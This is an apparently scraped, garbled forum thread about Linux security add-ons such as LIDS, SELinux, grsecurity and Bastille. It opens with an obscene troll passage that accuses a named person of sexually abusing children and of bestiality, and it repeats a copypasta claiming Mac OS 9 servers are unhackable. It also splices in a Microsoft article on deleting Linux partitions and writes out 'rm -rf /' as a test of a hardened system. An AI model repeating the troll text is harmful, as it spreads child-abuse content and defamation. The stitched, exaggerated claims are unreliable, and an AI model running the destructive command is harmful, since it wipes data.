Not content with being a pædophilic coprophile, Mr. Katz is also quite the zoophile. As if the sexual escapades with the helpless little boys arenâ(TM)t enough, Jon usually enjoys his juicy-douches best when his penis is firmly planted in a female goatâ(TM)s anus [yahoo.com]. He is also rumoured to get off on watching his little boys eat the goatâ(TM)s small, bean-like turds, and he often kills his older boys by letting his goats trample them.
â¦Are you getting hard writing this?
Why, yes.
No, thanks. Iâ(TM)m already CmdrTacoâ(TM)s boi toi.
________________________________________
* The URL of this document is
* Previous revisions are publicly available at
$Id: tacosnotting.html,v 1.16 2001/12/28 21:20:03 wipo Exp $
Copyright © 2001 J. Wipo Troll, Esq. [slashdot.org] Verbatim crapflooding of this document is permitted in any medium, provided this copyright notice is preserved, and next time you take a dump, you think of the WIPO Troll and all heâ(TM)s done to make Slashdot a better place.
- posted by poopbot: who doesn't like scat?
uJAmzaWmvo Post #768
> go for an operating system controlled by one company, who knows what their code does, and how to fix it if it goes wrong. The only option, in that case, is Microsoft.
Er... or Apple?
Yeah. Or, for that matter, RedHat.
And with RedHat (or any of the other linux vendors), not only do they know what their code does, but there are also thousands of programmers scattered around the world who know a lot about it.
So if you have a problem, you don't have to beg and plead with a disinterested CS department of a giant corporation. You don't even have to deal with your vendor.
If it's a small problem, you can probably hire one or two of the linux hackers at your local college. For bigger projects that take experience, you can hire a few of the local linux professionals.
You'll be up and running in far less time than it takes to persuade Microsoft to support your needs.
Those who do study history are doomed to stand helplessly by while everyone else repeats it.
Read about it in the RELEASE-NOTESe ta/limbo/en/os/i386/RELEASE-NOTES
ftp://videl.ics.hawaii.edu/mirrors/redhat/linux/b
Actually, the rule is usually the more you make, the more stupid you are.
-- Jason
I'd looked on and off at LIDS for a while, and one day decided to go for it. Brought it down to my desktop and began following instructions. The intent was to build the LIDS kernel and utilities on the desktop, and then scp them over to the firewall.
Except that LIDS seems to want to be built on the machine where it's going to be run. So what if your firewall doesn't have a compiler, build environment, etc?
Perhaps I should have RTFM further, but the available time ran out.
I've also read a little about SELinux, but there appears to be one common thing about all of these security enhancements: They make it possible to have tight enforcement of a security policy, but it appears that none of them ship any sort of policies. It would be nice to have a few to choose from, and begin learning. How about a policy that's very little more secure than the pre-LSM box, with a bunch of commented options to tighten down the screws. I guess I've seen some of that with GRSecurity.
But trying to evaluate and use any of these packages for a home system turns into a massive time-sink to do properly. WIBNI Bastille would add LSM to what they already do so well? (I know, join and do it, myself. Maybe when the big-time real world projects are in control.)
The living have better things to do than to continue hating the dead.
I say forget trying to patch up Linux, or OpenBSD and its exploitable SSH... try archetectures like the mac for trusted web servers taht are unbreakable based on historical evidence.
:
The MacOS running WebStar as a server has never been exploited.
In fact in the entire securityfocus (bugtraq) database history there has never been a Mac exploited over the internet remotely.
That is why the US Army gave up on MS IIS and got a Mac with WebStar.
I am not talking about BSD derived MacOS X (which already had a couple of exploits) I am talking about Mac OS 9 and earlier.
Why is is hack proof? These reasons
1> No command shell. No shell means no way to hook or intercept the flow of control with many various shell oriented tricks found in Unix or NT
2> No Root user. All mac developers know their code is always running at root. Nothing is higher (except undocumented microkernel stufff where you pass Gary Davidians birthday into certain registers and make a special call). By always being root their is no false sense of security.
3> Pascal strings. ANSI C Strings are the number one way people exploit Linux and Wintel boxes. The mac avoids C strings historically in most of all of its OS. In fact even its roms originally used Pascal strings. As you know pascal strings are faster than C (because they have the length delimiter in the front and do not have to endlessly hunt for NULL), but the side effect is less buffer exploits.
4> Stack return address positioned in safer location than intel. Buffer exploits take advantage of loser programmers lack of string length checking and clobber the return address to run thier exploit code instead. The Mac places return address infornt of where the buffer would overrun. Much safer.
5 : Macs running Webstar have ability to only run CGI placed in correct lodirectoy cation and correctly file typed.
6> Macs never run code ever merely based on how a file is named. ",exe" suffixes mean nothing. For example the file type is 4 characters of user-invisible attributes, along wiht many other invisible attributes, but these 4 bytes cannot be set by most tool oriented utilities that work with data files. For ecxample file copy utilities preserve launchable file-types, but JPEG MPEG HTML TXT etc oriented tools are physically incapable of creating an executable file. the file type is not set to executable for hte hackers needs. In fact its even more secure than that. A mac cannot run a program unless it has TWO files. The second file is an invisible file associated with the data fork file and is called a resource fork. EVERY mac program has a resource fork file containing launch information. It needs to be present. Typically JPEG, HTML, MPEG, TXT, ZIP, C, etc are merely data files and lack resource fork files, and even if the y had them they would lack launch information. but the best part is that mac web programs and server tools do not create files with resource forks usually.. TOTAL security.
7> There are less macs, though there are huge cash prizes for craking into a MacOS based WebStar server. Less macs means less hacvker interest, butthere are millions of macs sold, and some of the most skilled programmers are well versed in systems level mac engineering and know of the cash prizes so its a moot point, but perhaps macs are never kracked because there appear to be less of them. (many macs pretend they are unix and give false headers to requests to keep up the illusion, ftp http, finger, etc).
8> MacOS source not available traditionally, except within apple, similar to Microsoft source availability to its summer interns and such, source is rare to MacOS. This makes it hard to look for programming mistakes, but I feel the restricted source access is not the main reasons the MacOS has never been remotely broken into and exploited.
Sure a fool can install freeware and shareware server tools and unsecure 3rd party addon tools for e-commerce, but a mac (MacOS 9) running WebStar is the most secure web server possible and webstar offers many services as is.
One 3rd party tool created the only known exploit backdoor in mac history and that was back in 1995 and is not, nor was, a widely used tool. I do not even know its name.
Other than that event ages ago, no mac web server has ever been rooted,defaced,owned,scanned,exploited, etc.
I think its quite amusing that there are over 200 or 300 known vulenerabilities in RedHat over the years and not one MacOS 9.x or older remote exploit hack.
Not one. And that includes Webstar and other web servers on the Mac.
--- too bad the linux community is so stubborn that they refuse to understand that the Mac has always been the most secure OS.
BugTraq concurs.
Good deal! another look at the position here.
don't apply every single patch you find on the internet to your kernel.
It works marvellously when it works. Randomized pid, randomized sequence numbers, and soon to have ACL's that define resource limits on just about anything. Really powerful.
:)
When it works.
I've been trying to run it on an SMP Xeon for a while now, and any time the machine exerts itself I have to go hit the big red button. And it's not really a machine I'd like to do "testing" on, so no, I won't help with debugging. What "testing" I've done so far has been nothing but infuriating.
Another few tidbits: all the security in grsec basically completely prevents any JVM from running at all. Ditto UML. (Though UML may also have issues with SMP. But now that I've removed a big variable in my equation of horror...)
Since Rusell Coker has package SELinux for Debian, I will definitely have to investigate that sometime in the near future. I think I'll rack some uptime first to bolster my self esteem.
actually http://www.nsa.gov/selinux is great for a kernel module, or even compiled into it itself. True linux has proven itself better than it's (non-exzistant) competitor from Redmond. But with this security addon it makes it on the top of it's field. I think this is why the NSA has given it it's name SELinux: Security _enhanced_ linux. To define that would denote that linux had a lot of security before, and now with this add-on is _enhanced_ in many ways. Too bad I haven't been able to find anyone who can audit the NSA's work and help verify it for obvious & hidden flaws. nzru
Oops! I did it again
Virtual machines are not perfect... they can be detected by the way they fragment memory and visible from ring 0 commands.
:
but I would say just use a mac server instead if you want security that is by far the most secure.
The MacOS running WebStar as a server has never been exploited.
In fact in the entire securityfocus (bugtraq) database history there has never been a Mac exploited over the internet remotely.
That is why the US Army gave up on MS IIS and got a Mac with WebStar.
I am not talking about BSD derived MacOS X (which already had a couple of exploits) I am talking about Mac OS 9 and earlier.
Why is is hack proof? These reasons
1> No command shell. No shell means no way to hook or intercept the flow of control with many various shell oriented tricks found in Unix or NT
2> No Root user. All mac developers know their code is always running at root. Nothing is higher (except undocumented microkernel stufff where you pass Gary Davidians birthday into certain registers and make a special call). By always being root their is no false sense of security.
3> Pascal strings. ANSI C Strings are the number one way people exploit Linux and Wintel boxes. The mac avoids C strings historically in most of all of its OS. In fact even its roms originally used Pascal strings. As you know pascal strings are faster than C (because they have the length delimiter in the front and do not have to endlessly hunt for NULL), but the side effect is less buffer exploits.
4> Stack return address positioned in safer location than intel. Buffer exploits take advantage of loser programmers lack of string length checking and clobber the return address to run thier exploit code instead. The Mac places return address infornt of where the buffer would overrun. Much safer.
5 : Macs running Webstar have ability to only run CGI placed in correct lodirectoy cation and correctly file typed.
6> Macs never run code ever merely based on how a file is named. ",exe" suffixes mean nothing. For example the file type is 4 characters of user-invisible attributes, along wiht many other invisible attributes, but these 4 bytes cannot be set by most tool oriented utilities that work with data files. For ecxample file copy utilities preserve launchable file-types, but JPEG MPEG HTML TXT etc oriented tools are physically incapable of creating an executable file. the file type is not set to executable for hte hackers needs. In fact its even more secure than that. A mac cannot run a program unless it has TWO files. The second file is an invisible file associated with the data fork file and is called a resource fork. EVERY mac program has a resource fork file containing launch information. It needs to be present. Typically JPEG, HTML, MPEG, TXT, ZIP, C, etc are merely data files and lack resource fork files, and even if the y had them they would lack launch information. but the best part is that mac web programs and server tools do not create files with resource forks usually.. TOTAL security.
7> There are less macs, though there are huge cash prizes for craking into a MacOS based WebStar server. Less macs means less hacvker interest, butthere are millions of macs sold, and some of the most skilled programmers are well versed in systems level mac engineering and know of the cash prizes so its a moot point, but perhaps macs are never kracked because there appear to be less of them. (many macs pretend they are unix and give false headers to requests to keep up the illusion, ftp http, finger, etc).
8> MacOS source not available traditionally, except within apple, similar to Microsoft source availability to its summer interns and such, source is rare to MacOS. This makes it hard to look for programming mistakes, but I feel the restricted source access is not the main reasons the MacOS has never been remotely broken into and exploited.
Sure a fool can install freeware and shareware server tools and unsecure 3rd party addon tools for e-commerce, but a mac (MacOS 9) running WebStar is the most secure web server possible and webstar offers many services as is.
I think its quite amusing that there are over 200 or 300 known vulenerabilities in RedHat over the years and not one MacOS remote exploit hack.
not one ever.
The information in this article applies to:
/dev/sda1 * 1 500 4016218 83 Linux native (SCSI hard drive 1, partition 1) /dev/sda2 501 522 176715 82 Linux swap (SCSI hard drive 1, partition 2)
/dev/sda1 * 1 500 4016218 83 Linux native (SCSI hard drive 1, partition 1) /dev/sda2 501 522 176715 82 Linux swap (SCSI hard drive 1, partition 2) /dev/sdb1 1 500 4016218 83 Linux native (SCSI hard drive 2, partition 1)
/dev/hda1 * 1 500 4016218 83 Linux native (IDE hard drive 1, partition 1) /dev/hda2 501 522 176715 82 Linux swap (IDE hard drive 1, partition 2)
/dev/hda1 * 1 500 4016218 83 Linux native (IDE hard drive 1, partition 1) /dev/hda2 501 522 176715 82 Linux swap (IDE hard drive 1, partition 2) /dev/hdb1 1 500 4016218 83 Linux native (IDE hard drive 2, partition 1)
n fo/admi nistration/management/mltiboot.asp
* Microsoft Windows XP Home Edition
* Microsoft Windows XP Professional
For a Microsoft Windows 2000 version of this article, see Q247804.
Summary
This article explains how to remove the Linux operating system from your computer and install Windows XP. This article assumes that Linux is already installed on your computer's hard disk, that Linux native and Linux swap partitions are in use (which are incompatible with Windows XP), and that there is no free space left on the hard disk.
NOTE: Windows XP and Linux can coexist on the same computer. For additional information, refer to your Linux documentation.
More Information
To install Windows XP on a computer on which Linux is currently installed (and assuming that you want to remove Linux), you must manually delete the partitions used by the Linux operating system. The Windows-compatible partition can be created automatically during the installation of Windows XP.
IMPORTANT: Before you follow the steps in this article, verify that you have a bootable disk or bootable CD-ROM for the Linux operating system, because these steps completely remove the Linux operating system from your computer. If you intend to restore the Linux operating system at a later date, verify that you also have a functional backup of all the information stored on your computer. Additionally, you must have a full release version of Windows XP to use during this installation. If you intend to use a Windows XP upgrade CD-ROM, a CD-ROM of a qualifying Windows product must be available. Setup from the Windows XP upgrade CD-ROM will prompt you for this CD-ROM.
Linux file systems use a superblock at the beginning of a disk partition to identify the basic size, shape, and condition of the file system.
The Linux operating system is generally installed on partition type 83 (Linux native) or 82 (Linux swap). The Linux boot manager (LILO) can be configured to start from either of the following locations:
* The hard disk Master Boot Record (MBR)
-or-
* The root folder of the Linux partition
The Fdisk tool included with Linux can be used to delete the partitions. (There are other utilities that work just as well, such as Fdisk from MS-DOS 5.0 and later, or you can delete the partitions during the installation process.)
To remove Linux from your computer and install Windows XP, follow these steps:
1. Remove the native, swap, and boot partitions used by Linux: Start your computer with the Linux Setup floppy disk, type fdisk at the command prompt, and then press ENTER. NOTE: For help with using the Fdisk tool, type m at the command prompt, and then press ENTER.
2. Type p at the command prompt, and then press ENTER to display partition information. The first item listed is hard disk 1, partition 1 information, and the second item listed is hard disk 1, partition 2 information.
3. Type d at the command prompt, and then press ENTER. You are then prompted for the partition number that you want to delete. Type 1, and then press ENTER to delete partition number 1. Repeat this step until all the partitions have been deleted.
4. Type w, and then press ENTER to write this information to the partition table. Some error messages may be generated (because information is written to the partition table), but they should not be significant at this point because the next step is to restart the computer and then install the new operating system.
5. Type q at the command prompt, and then press ENTER to quit the Fdisk tool.
6. Insert either a bootable floppy disk or the bootable Windows XP CD-ROM, and then press CTRL+ALT+DELETE to restart your computer.
2. Follow the instructions on the screen to install Windows XP.
The installation process assists you in creating the appropriate partitions on your computer.
Sample Linux Partition Tables
Single SCSI Drive
Device Boot Start End Blocks Id System
Multiple SCSI Drives
Device Boot Start End Blocks Id System
Single IDE Drive
Device Boot Start End Blocks Id System
Multiple IDE Drives
Device Boot Start End Blocks Id System
Additionally, Linux recognizes more than 40 different partition types, including the following:
* FAT 12 (Type 01)
* FAT 16 > 32 M Primary (Type 06)
* FAT 16 Extended (Type 05)
* FAT 32 w/o LBA Primary (Type 0b)
* FAT 32 w/LBA Primary (Type 0c)
* FAT 16 w/LBA (Type 0e)
* FAT 16 w/LBA Extended (Type 0f)
Note that there are other ways to remove the Linux operating system and install Windows XP. The preceding method is included in this article because of the assumptions that the Linux operating system is already functioning and there is no more room on the hard disk. There are methods for changing partition sizes with software designed for managing partitions. Disk partitioning software may cause instability with the Windows XP installation. Microsoft does not support the installation of Windows XP on partitions manipulated in this manner.
You can also use an MS-DOS version 5.0-or-later boot disk, a Microsoft Windows 95 Startup disk, or a Microsoft Windows 98 Startup disk that contains the Fdisk utility to remove an operating system from the hard disk and install a different operating system. When you start Fdisk and multiple drives are installed on your computer, you are presented with five choices; use option 5 to select the hard disk that has the partition to be deleted. After that (or if you have only one hard disk), select option 3 (Delete partition or logical DOS drive), and then select option 4 (Delete non-DOS partition). You should then see the non-MS-DOS partitions that you want to delete. Typically, the Linux operating system has two non-MS-DOS partitions, but there may be more. After you delete one partition, use the same steps to delete any other appropriate non-MS-DOS partitions.
For additional information about how to use the Fdisk utility, click the article number below to view the article in the Microsoft Knowledge Base: Q255867 How to Use the Fdisk Tool and the Format Tool to Partition or Repartition a Hard Disk After you delete the partitions, you can create partitions and install the operating system that you want. You can create only one primary partition and an extended partition with multiple logical drives by using Fdisk from MS-DOS version 5.0-and-later, Windows 95, and Windows 98. The maximum FAT16 primary partition size is 2 gigabytes (GB). The largest FAT16 logical drive size is 2 GB.
For additional information, click the article number below to view the article in the Microsoft Knowledge Base: Q105074 MS-DOS 6.2 Partitioning Questions and Answers
When you install Windows XP, the Linux partitions can be removed and new partitions created and formatted with the appropriate file system type during the installation process. Windows XP allows you to create more than one primary partition. Windows XP does recognize the FAT32 file system. During the installation of Windows XP, you can create a very large FAT32 drive. The FAT32 drive can be converted to NTFS after the installation has completed, if appropriate.
For additional information about how to multiboot with Windows XP, click the article number below to view the article in the Microsoft Knowledge Base: Q306559 HOW TO: Create a Multiple-Boot System with Windows XP
For more information, browse to the following Microsoft Web site:
http://www.microsoft.com/windows2000/techi
The third-party contact information included in this article is provided to help you find the technical support you need. This contact information is subject to change without notice. Microsoft in no way guarantees the accuracy of this third-party contact information.
The third-party products discussed in this article are manufactured by vendors independent of Microsoft; we make no warranty, implied or otherwise, regarding these products' performance or reliability.
- posted by poopbot: providing truth in a deceitful world
BHlT0MEz1m Post #770
I'm suprised no one has pointed out systrace yet. Granted, it's not for linux, only OpenBSD and NetBSD at this point, but it seems to be a very promising move in the ACL world. As one other poster commented, the most difficult challenge with any heavily ACL'ed environment is configuring the ACL's and making sure you didn't miss something. It's an extremely tedious process that requires a lot of reloads until it's done right.
Systrace eliminates much (but not all) of that initial trial period with a method of analyzing processes and watching what permissions for what resources they need and generating ACL's based on 'normal' use. This interactive mode ~greatly~ simplifies the otherwise length process of configuring the kind of security modules being discussed.
No Debian package... :(
Buy an abacus and a typewriter.
Sample here.
What part of "gestalt" don't you understand?
This past January-June, I worked on a project involving LIDS. I was responsible for all the setup/maintenance. Setup for LIDS is extremely easy. The difficult part is setting up the ACL's. For a complex system with many daemons running, this might be a difficult task. Fortunately, you can find plenty of people who make their ACL lists public, so you can see how to setup common things such as Sendmail, Apache, SSH, etc. With a good ACL list, your box will be as secure as it can get. With constant attacks on our LIDS box, no one ever got total control. The one time we let someone get root (for research purposes), that person was not able to do anything (even root can be made to not have certain accesses). I highly recomend LIDS to anyone looking for a more secure linux.
So why aren't we all using Mac OS for webservers? (excluding OS X)
- It's a major PITA to do any kind of remote management. While the lack of a command prompt may make it hard to hack, it also makes it nearly impossible to administer remotely (unless you resort to a VNC-like solution, in which case you are subject to all the flaws of that solution)
- Macs are expensive. Look at XServe. Look at comparable Linux servers. XServe is expensive.
- Lack of software: Mac OS wasn't traditionally a server OS, so many of the tools that we know and love in Linux and even Win32 are missing
- Mac OS 9 Sucks: Memory management, swap maangment, networking, etc. Mac OS 9 makes Windows 98 look like a reliable, stable system.
This is not to say that Mac OS doesn't have a place as a server. For applications where security is critical and remote access, cost, or performance isn't a priority, it's certainly a viable option. It's perfect for the Army: cost and performance are not issues (they have a $300 billion/year budget, and if it's too slow they can just invest in better hardware), but security is a MUST.
I work in a small company, with a small server room. It has two RS-9000, one compaw tower, and one HP LH-somthing. The information isn't really worth stealing, and you would have to walk through the entire IS department to get the hardware out.
Yet, we got slapped by our corporate owner's internal audit for leaving the door open. We now have to keep it closed at all times. Unfortunately the IT department is so understaffed that everyone has reason to be in that room, we don't have the resources for a dedicated operator that can serve our development needs and the actuall day to day needs of the company.
So there is one key, where everyone knows where it is. This isn't protecting anything, ever. Sure physical security is important, but should you weigh the risk?
This has real potential for locked-down servers, kiosk systems, etc. It's a bit stringent for most desktops. But it's not too hard to use.
Unfortunately this seems to have been the principle result of Microsoft's much vaunted house-keeping. Net result does not seem to be a reduction in the number of existing security bugs.
See my journal, I write things there
By taking the time to respond to it, what does that make you?
You can find the site at MicroBSD>Net
1) Agreed
2) No Root users? Bzzz...every user is a root user. This means if/when exploits do happen, the ability for them to ALWAYS be fatal is ALWAYS there.
3) The #1 biggest reason why remote exploits will be rare. This, and only this, is the primary reason.
4) Moot issue since pascal strings minimize that vast majority of these issues to begin with.
6) Pretty much every real OS has this concept. Mac is hardly alone.
7) True, being a minority does help. Other OS's play header tricks too. On the other hand, this also means much fewer selections in available applications which mean odds are automatically reduced in the number of possible exploits. Basically, zero applications means zero odds of being exploited. I think you can follow the logic from there.
8) Security through obscurity can sometimes help but rarely is the solution. In fact, history proves that this often creates more problems than it fixes because fewer eyes ever see enough code to fix it before it becomes a problem.
You can find the Site at MicroBSD.Net
Macs have astounding performance...
For example.. a stock Dual 1 Ghz G4 mac performs over TWICE as many RC5 keys per second as the fastest dual AMD MP motherboard.
And that mac is under 2999 dolalrs and comes with DVD-R burner (a 300 dollar value).
TWICE as many RC5s per second than an AMD, probably because Macs have huge L3 caches, and no AMD have a L3 cache.
Also Macs can read and write simultaneously to a cold page of ram faster than any AMD mother board can. Perhaps RC5 benefits from this as well.
Mac file system is fast too... very fast compared to most UNIX filesystems.
http://projectfiles.com/firewall/ It looks simple...potentially a good thing. Anyone have experience with this yet?
One of the best ways to keep your system secure is to keep it simple: remove daemons, remove kernel modules, remove software you don't need, etc.
he's saying that OBSD IS well documented if anything (you seemed to interpret the negative), that is in addition to his saying he thinks that it is "quite good"
What are you? A moron or something? Let me guess. The only reason you can possibly use a computer is because you have a mouse. This is such a bunch of bs. Security at Microsoft is like white shit. It doesn't exist until it's so old as to be un-needed. Personally, I believe in the right tool for the right job. MS or Unix(Linux), doesn't matter. I do what the customer wants. Security wise, I know better than to trust anything M$ does or says about security. Their track record speaks for itself. As far as Linux goes, no flames here, I like it, I started with it, but BSD makes my life easy, and you can't beat the security auditing that OpenBSD goes through. Not to mention; lately, OpenBSD runs better on antiquated hardware than Linux used to.. So much for keeping the kernel small and lightweight.
Goes post on MS newsgroup you asshole. Maybe you can find some dumbass to believe you long enough for you to get paid.
at sourceforge has been in dev for years
Opensource is great, but takes way too much patience to get anything done...Linux is coming along great, but look how hold it is
LOL
XServe is a better compared to a Sun Netra T1 than a "linux server".
Most linux servers are junk. VA made some of the biggest piles of junk. Those 1st gen boxes? LOL. FullOn? BAH, garbage.
Penguin Computers? junk.
Compaq makes nice boxes, and they do run Linux.
I used to run lids and grsecurity, but now I feel that the acl system in grsecurity is more powerful that that in lids.
Grsecurity's non-acl options are awesome. No setup, and almost all programs work as before (execept some programs that nedd stack execution, but that is a piece of cace to fix.)
BUT (and here comes my main point) the acl system (both in grsecurity and form my earlier experience from lids) needs more debugging. LIDS once released a version where you couldn't run (almost) any program because of the LD_LIBRARY flags, and grsecurity give me kernel panic every now and then. No problem on my system, it gives me and excuse for poking in the kernel source, but I would never use the acl on a production system.
I don't know the facts about Linux, specifically, but there is a push in the *BSD world for kernel security features to be incorporated as defaults.
The only one I recall off the top of my head is "non-executable stacks" to keep stack overflow attacks from being quite as easy. I'm sure it has other advantages, as well.
All this does is "raise the bar" for attackers. I'm assuming most of the Linux kernel security tweaks do the same.
-- clvrmnky
i'm going to make a point
weather you listen or not is up too you
number one reason a mack server has never been hacked ? what companies run them ? like the other poster said there internal memory management sucks. and yes for most people running a server PERFORMANCE MATTERS.
next is the interest level, what l33t hacker would be even the slightest bit interested in this ? i have not yet seen or heard anybody in the community talking about how 'hard' or 'interesting'a mac hack would be. because nobody who matters (big companies, banks etc..) run them.
and source being availible or not doesnt matter , it never has the problem with bugs being easier to find is offset by the speed a fix is availible. look at NT4 it has an estimated 65,000 bugs. nobody can find them because the source isn't there right? WRONG ! all it takes is some creative testing and reverse engineering and you can find them. conversly look at red-hat 300 known bugs right ? how many of them are patched ? 99% ? and of the ones that are not how easy are they to exploit ?
either way it comes down too one thing. intelligence of the admin. servers were nt and are not made for joe schmoe to run. PERIOD all these people who complain about how 'hard' it is too admin a unix server SHOULDNT be doing it in the first place.
oh and i'd also like too point out that unless a blackhat wants to go corporate he wont go for a cash prize because it puts the spotlight onto him. and that is a BAD THING (tm) when your are doing "illegal things"
"Two things are infinite: the universe and human stupidity; and I'm not sure about the the universe." --Albert Einstein
I quote from Usenix88:
Indeed there are ways to do closures without an executable stack, usually by modifying a stub that resides in the text segment of a binary, but it's much nastier.Better would be to use other existing tools for buffer overruns IMHO.
It seems to me LSM (Linux Security Module) is the former SELinux (Security Enhanced Linux) from NSA. The LIDS (Linux IDS) is totally independent. The news is that LSM has been accepted into the development kernel tree.
Think... What is the single most unreliable "trusted" element of your security setup? Your staff.
Be nice to your PFY(s) people! :)
Ali
Ph33r m3!!!
And -- I'm sorry to break you the news. But I used to work at an ISP whose pages where served in a WebStar... Till somebody erased all the clients' pages twice... And then I put an RedHat/Apache/Intel in its place. Worked like a charm...
Nice troll.
In what sense is garbage collection a security feature? That makes no sense.
I'm sorry I can't give a better reference, but search google for "virtual machine halting problem". Vaguely, if a virtual machine does not have garbage collection, proving that some code is "safe" (in the sense "will not dump core") is tantamount to solving the halting problem. So GC is relevant to the security of VMs. For java, at least, this form of security is most important for applets running on the client side. For C, garbage collection would be useful simply to discourage use of static fixed-size buffers by encouraging the use of lots of dynamic memory management. But that's an issue of practical code habits, not computer science.
- time = money
- knowledge = power
- power = work / time
- knowledge = work / money
- knowledge * money = work
- money = work / knowledge
- therefore, as knowledge --> 0, money --> infinity!
QEDcpeterso
www.kerneli.org
EOF
You must feel kinda silly now that the recent OpenSSH ChallengeResponse bug can root a default OpenBSD remotely in seconds...
I don't consider myself a full-on security guru, but from my experience, Immunix has a very good track record. Crispin Cowen has published many white papers concerning the stackguard compiler and how it will prevent buffer overflow attacks. Combine this with FormatGuard, and a resonable price ($100, free for non-commercial use. Check it out at http://wirex.com/Products/Immunix/purchase.html.
Don't forget to use Bastille to harden it after you install. Or you could do it manually, than you will need to remove SUID crap, use CHATTR to make your critical conf files immutible, and many, many other tricks. You can read about it http://www.bastille-linux.org/. Hope that helps.
I may be bad with names, but I'll never forget your IP address
All these add-ons are nice, but you can easily have a very hardened server without installing nor patching anything. Linux, *BSD and probably other operating systems have extended fs attributes for ages.
/" as root, and your system must still be up and running. No need for any integrity checker.
With standard commands like chflags (BSD) or chattr (Linux), you can mark files and directories read-only (immutable) or append-only.
The point is that once you have a working system, and if you have local access to the console, you can set proper attributes to all your files.
You then have the concept of "security levels". Once your box is in multi-user mode, the "security level" can increase, and a lot of thing will be refused by the kernel : changing firewall rules, access to kmem, to raw devices, etc. and changing extended attributes.
So even if an attacker gets root access on your box, he won't be able to alter anything except some ever changing files (something that can be solved by using an NFS mount) . And the append-only log files are really nasty, because he won't be able to hide what he's doing. Patch your favorite shells to always log history files to an append-only file to get even more fun.
On a properly configured box (that you have console access on), you must be able to run "rm -rf
{{.sig}}
...their existance points at a deeper problem. The linux security model is based off of the unix security model which basically expected users to do two things:
1. Log in through a text mode terminal.
and
2. Run programs (i.e. use cpu time and memory).
Since the demands of computer users began to expand beyond those original expectations (graphical interface, selective access to administrative abilities, etc...) the solution has always been to write a suid program that simply snags root priveleges and tries not to let the user do anything bad while it's running. Sure, it works, and linux-based systems have come a long long way, but the fundamental problem remains: to the OS, a user is a user is a user (except root). The linux security model hasn't expanded to meet new challenges, it's been circumvented by suid programs and as a result instead of a single point of possible penetration (a problem with the kernel) there are hundreds of possible ways to take over the system and hundreds of programs that must be maintained in order to keep the system secure.
Yes, chroot is an absolutely beautiful solution in many cases. No, I'm not saying linux is terribly insecure. What I am saying is that a new philosophy needs to be employed in designing security models: if a program has to become root (or the equivalent) to perform its function, something is wrong with the security model. It seems to me that this kind of thinking, combined with an elegant system to keep track of who is allowed to do what, would do wonders for the maintainability and usability of linux based OSs.
Like we all buy computers to leave them around running RC5 code... A single cpu AMD will smoke your dually G4 at mpeg encoding by 70%, and that will cost you less than $800.
One of the biggest problems with SELinux is the non-trivial effort involved in creating policies. It took me a couple of nights just to get to grips with the concepts...
There's a real need for some sort of tool that just builds and manages simple policies for daemons, apps & utilities. Problem is, that sort of thing is best built upon a sound model of the policy. apol (http://www.tresys.com/selinux.html) has something, and there's work going on at IBM (Alphaworks?) and at MITRE, all of it very cool stuff, but it's a) geared towards analysis, and b) proprietary.
Bastille linux is a hoax.
It doesn't secure anyting at all.
Patching the Linux kernel (grsecurity, etc.) and implimenting ACLs is one level of security enhancement one can emply.
Userspace hardening (e.g. Bastille) is another.
Virtual servers sounds like an interesting approach as well (virtual servers running a grsecured, hardenend system anyone?)
But, security for things like web services do not end with kernel patches or even userspace hardening utilities.
As [...] noted here, the 'security' of Slashdot's moderation system has been shot to hell (astroturfers of various ilks, most commonly but not exclusively Microsoft paid lackeys, and outright trolls are posting at +2 and being granted moderator priveleges on a daily basis). As to whether the above troll you reference was moderated up by trolls, Microsoft Astroturfers, or a combination is anyone's guess.
The fix is obviously for the slashdot editors to begin creating a web of trust in a similar fashion to how GPG/PGP keys are managed (complete with revokation if that trust is abused). Initially only the slashdot moderators and some well known friends of theirs would be in the ring of trust, then gradually others (based upon posting content, relationships, what have you). This would at least allow the Astroturfers and trolls to have their moderation and/or +2 posting priveleges removed when they do occasionally slip through.
In the meantime, until such an approach is taken, I'm afraid the astroturfers and trolls will continue to abuse the moderation system for the foreseeable future. Numerical benchmarks such as karma simply do not cut it when trying to filter for quality of content, discussion, moderation, and meta-moderation.
Slashdot security in a discussion of security now rates a -3 Offtopic?
So, by pointing out that security for a web server doesn't stop at kernel patches, and pointing to a real world example to underscore that point (this very site), the comment is somehow now offtopic? I think this thread makes the aforementinoed example even more pointed than it already was.
Or is self-criticism now a taboo subject on this forum? Remarkable.
The Future of Human Evolution: Autonomy
Erasing pages is one thing.
But turning your linux machine into a staging point for going after other targets is another, more serious problem.
The only reason one would consider using a pre-Mac OS X server is
1) Without memory protection, a random buffer overrun attack may lock up the computer, a better situation than just crashing the app and letting the system go on.
2) If the attacker does manage to subvert the program, it's impossible to start up a remote command shell.
3) If the attacker does manage to get a remote command shell going, it's impossible to find command-line applications installed on the Mac that will allow downloading of files and the installation of backdoored programs.
4) Making a compromised Mac a dead end deal, ie. nothing much else can be done.
Issues with webpages being deleted can be easily worked around with a good backup/replication/etc. Hell, have the webpages served off a read only AppleShare that's connected to the actual webserver, the attacker won't be able to alter your web data.
I know you're all too lazy to read the entire release notes, so jump directly to the source of these tools. RedHat's release notes say:
This beta contains a kernel providing EA and ACL support for the ext3 filesystem based on the patches and user-level tools from http://acl.bestbits.at/
So, check them out directly. They have more information than the RELEASE-NOTES, and some useful examples.
don't just make an assertion, back it up. unsupported claims are pointless.
you may have a point to make, but you didn't make it here; you didn't teach us anything.
if i'm a grammar nazi, you're an illiteracy nazi.
I wouldn't say it secures *nothing*. In fact, I'd say it secures a lot of things many people don't even think about. But you are right, it's not as strong in the "prevent the buffer overflows" category, and most of the things it does a good admin would do by hand anyway.
It's got some pretty good file permission changes that work very well for server environments. And yes, file permissions really do matter. Even on the simplest level it will ask you to remove SUID permissions from ping, dump, traceroute, at, etc. I know for sure there's been at least one local user -> root user exploit for dump that would be foiled if it were non-suid. There was even one this year for at which allowed the same privilege elevation on RedHat versions prior to 7.2:
http://rhn.redhat.com/errata/RHSA-2002-015.html
Of course, a good admin should go through and audit which files are SUID him or herself and kill off ones which aren't used by non-root users. But this makes it a bit easier.
And yes, removing the SUID bits does make fewer commands available to non-root users, but let's face it, do non-root users really need to be able to run traceroutes and backups from your webserver?
-Matt
1> No command shell. No shell means no way to hook or intercept the flow of control with many various shell oriented tricks found in Unix or NT
Macs have AppleScript which allows a script to do basically anything a shell could. If someone breaks in, they need only activate an AppleEvent to download some trojan code and execute that trojan code.
3> Pascal strings. ANSI C Strings are the number one way people exploit Linux and Wintel boxes.
This is an excellent point, but buffer overflows can occur with arrays and other data structures. Furthermore, while the OS may use Pascal strings, applications that run on top of the OS can use any type of string they choose.
